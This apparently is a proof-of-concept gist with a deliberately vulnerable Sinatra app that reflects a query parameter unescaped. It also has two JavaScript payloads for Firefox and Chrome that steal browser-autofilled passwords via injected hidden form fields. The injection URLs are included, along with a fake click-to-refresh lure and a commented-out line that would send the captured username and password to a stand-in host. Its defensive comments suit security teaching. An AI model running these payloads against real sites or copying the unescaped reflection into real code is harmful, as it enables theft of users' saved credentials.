@73696e65
Last active May 9, 2022 21:24
Autocomplete Password Stealing PoC (FF & Chrome)
#!/usr/bin/env ruby
require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'
# python -m SimpleHTTPServer
# ruby ./server
# http://127.0.0.1:4000/?lang='><script>alert()</script>
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-innerHTML.js"></script>
# http://127.0.0.1:4000/?lang='><script src="http://127.0.0.1:8000/stealCreds-onClick.js"></script><!--
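class InjectDemo < Sinatra::Base
  # Deliberately vulnerable demo application for the reflected-XSS exercise
  # described in the header comments. The only intentional weakness is the
  # unencoded reflection of `lang` on "/"; everything else should be plain,
  # well-formed HTML so the demo behaves the same in every browser.

  # Login form. The two inputs carry the ids ("username" / "password") that
  # the accompanying scripts look up.
  get "/login" do
    # The original markup carried a meaningless `submit='/'` attribute on the
    # button; `action='/'` on the form is what actually sets the target.
    <<-HTML
<form method='POST' action='/'>
Username: <input id='username' type='text' value='' /><br />
Password: <input id='password' type='password' value='' /><br />
<input type='submit' value='Submit' />
</form>
    HTML
  end

  # Index page. `lang` is taken straight from the query string and interpolated
  # into a single-quoted href WITHOUT encoding -- this is the injection point
  # the demo exists to show. Real code would write
  # `Rack::Utils.escape_html(lang)` here (better: validate against an allow-list
  # of locale codes) and serve a Content-Security-Policy so an injected
  # <script> could not run even if encoding were missed.
  get "/" do
    # params['lang'] is the Sinatra-idiomatic equivalent of request['lang']
    # (Rack::Request#[] was dropped in Rack 3).
    lang = params['lang'] || "en_US"
    <<-HTML
<div align=center>
To login, go to the login page at
<a href='http://127.0.0.1:4000/login?lang=#{lang}'>http://127.0.0.1/login</a>
</div>
    HTML
  end

  # Form target: bounce the browser back to the index page after one second.
  # The original tag had mismatched quotes (`content='1;url='http://...'`),
  # which the HTML parser reads as an empty url= followed by a stray attribute,
  # so the refresh never reached the index page; the value is now one token.
  post "/" do
    <<-HTML
<meta http-equiv='refresh' content='1;url=http://127.0.0.1:4000'>
    HTML
  end
end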
# Mount the demo app at "/" and serve it on the loopback interface, port 4000,
# using Thin. Thin's own logging is switched off so only the ready line below
# appears on stdout.
@routes = { "/" => InjectDemo.new }
@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("127.0.0.1", 4000, @rack_app)

Thin::Logging.silent, Thin::Logging.debug = true, false

puts format("[%s] Thin ready", Time.now)
@thin.start
/* Autocomplete Password Stealing for Firefox */
// Configuration
// Element ids the script looks up; they match the inputs on the demo's /login page.
// All three are assigned without var/let, so they are globals shared with the
// functions below (and with any other script on the page).
user_id = "username";
pass_id = "password";
remembered = ''; // Stored UserName -- value pre-filled into the hidden username field; empty here
// End of configuration
// Reads whatever the browser has filled into the two hidden inputs created by
// appendDiv() and writes "user-pass" to the console. The outbound-request line
// is commented out, so this file only demonstrates local access to the values;
// from a detection standpoint, an injected script making an outbound request
// that carries form field values is the signal to look for.
// un, pw and check are implicit globals (no var), so every call clobbers them.
function stealCreds() {
un = pw = "";
un = document.getElementById(user_id).value;
pw = document.getElementById(pass_id).value;
// new Image().src = "http://example.com/?" + un + "-" + pw;
console.log(un + "-" + pw);
// Unconditional: the 2 s poller set up at the bottom of the file fires exactly
// once, whether or not autofill has happened by then.
window.clearInterval(check);
}
// Appends an invisible username/password input pair to <body>, using the same
// ids as the real login form and autocomplete='on' so the browser's saved-login
// autofill may populate them. The wrapper is hidden only after insertion, via
// visibility:hidden, so the user never sees the fields.
// Defensive note: this runs only because the page reflected untrusted input
// into markup; output encoding plus a Content-Security-Policy on the server
// prevents the script from executing in the first place.
function appendDiv() {
var div = document.createElement("div");
div.id = 'myform';
div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" +
"<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";
document.getElementsByTagName("body")[0].appendChild(div);
document.getElementById('myform').style.visibility = 'hidden';
}
// Entry point: insert the hidden fields, then poll once after 2 s.
// `check` is an implicit global so stealCreds() can clear it.
// setInterval with a string argument is evaluated like eval(); a CSP without
// 'unsafe-eval' blocks this call even where script execution is otherwise allowed.
appendDiv();
check = window.setInterval("stealCreds();", 2000);
/* Autocomplete Password Stealing for Chrome */
// Configuration
// Element ids the script looks up; they match the inputs on the demo's /login page.
// Every value here is an implicit global (no var/let), shared with the functions below.
user_id = "username";
pass_id = "password";
remembered = ''; // Stored UserName -- value pre-filled into the hidden username field; empty here
message = "<b>Please click here to refresh</b>"; // markup shown by showMsg() to prompt a click
redirect_to = 'http://127.0.0.1:4000' // where the click handler sends the browser afterwards
// End of configuration
// Reads whatever the browser has filled into the two hidden inputs created by
// appendDiv() and writes "user-pass" to the console. As in the Firefox variant
// the outbound-request line is commented out, so only local access is shown;
// an injected script making an outbound request carrying form values is the
// detection signal. un and pw are implicit globals (no var).
function stealCreds() {
un = pw = "";
un = document.getElementById(user_id).value;
pw = document.getElementById(pass_id).value;
// new Image().src = "http://example.com/?" + un + "-" + pw;
console.log(un + "-" + pw);
}
// Appends an invisible username/password input pair to <body> with the same ids
// as the real login form and autocomplete='on', then hides the wrapper with
// visibility:hidden. Identical to the Firefox variant.
// Defensive note: output encoding of `lang` on the server plus a
// Content-Security-Policy prevents this script from running at all.
function appendDiv() {
var div = document.createElement("div");
div.id = 'myform';
div.innerHTML = "<input type='text' name='" + user_id + "' id='" + user_id + "' value='" + remembered + "' autocomplete='on'>" +
"<input type='password' name='" + pass_id + "' id='" + pass_id + "' value='' autocomplete='on'>";
document.getElementsByTagName("body")[0].appendChild(div);
document.getElementById('myform').style.visibility = 'hidden';
}
// Appends the configured `message` to <body> as a paragraph. innerHTML is used
// because the message string itself contains markup (<b>...</b>).
function showMsg() {
var p = document.createElement("p");
p.innerHTML = message;
document.getElementsByTagName("body")[0].appendChild(p);
}
// Entry point: add the hidden fields and the visible prompt, then on the first
// click anywhere in the page read the fields and navigate to redirect_to.
// Waiting for a click (instead of polling as the Firefox variant does)
// presumably works around Chrome only autofilling after a user gesture -- confirm.
// Assigning window.onclick replaces any handler the page already had.
appendDiv();
showMsg();
window.onclick = function() {
stealCreds();
document.location = redirect_to;
}